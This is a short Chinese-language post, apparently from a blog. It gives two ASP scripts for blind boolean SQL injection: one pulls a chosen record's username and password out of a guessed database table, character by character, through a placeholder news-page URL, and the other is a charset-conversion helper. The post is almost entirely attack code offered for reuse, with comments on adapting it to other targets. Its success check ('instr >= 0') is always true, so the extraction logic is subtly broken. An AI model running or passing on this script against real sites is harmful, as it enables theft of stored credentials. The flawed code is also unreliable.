閒來無事,玩了玩Sql Injection,數據表名及字段名猜測就不貼了,貼一下直接獲得已知表名字段名的數據的過程!
getdata.asp
<!--#include file="gbutf.asp"-->
<%
Server.ScriptTimeOut = 6000000
function getuid(n,col,getid)
dim rv
rv = "無"
for i = 0 to 200 '取ASCII碼範圍,負數(漢字)的沒做處理;
dim urlpath 'http://www.xxxxxxxxx.com/news.asp?id=1爲要注入的目標地址,[TABLE]爲您已經猜測到的表名,where id=爲該表的字段id,如果沒有,可以更改語句如order by ???
urlpath = "http://www.xxxxxxxxx.com/news.asp?id=1%20or%20(select%20top%201%20asc(mid("&col&","&n&",1))%20from%20[TABLE]%20where%20id="&getid&")="&i&""
With xmlhttp
.Open "GET",urlpath,False
.Send
End With
If xmlhttp.Status = 200 Then
dim result
result = xmlhttp.responseBody
result = BytesToBstr(result,"GB2312")
If instr(result,"錯誤信息") >= 0 then '這裏的錯誤信息設定爲實際頁面上的錯誤信息
rv = chr(i)
Exit For
end if
End if
next
If rv<>"無" then
Response.write rv
If n<15 then '假設字段長度爲15,如果實際更長就改大,否則就縮小,加快速度;
getuid int(n+1),col,getid
end if
end if
end function
dim xmlhttp
Set xmlhttp = Server.CreateObject("MSXML2.XMLHTTP")
'getuid函數參數意義
'參數1:從第一位開始取;
'參數2:要獲取數據的字段名;
'參數3:指定的數據編號,如id=1的記錄
getuid 1,"username",1
response.write " : "
getuid 1,"password",1
Set xmlhttp = Nothing
%>
gbutf.asp
<%
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>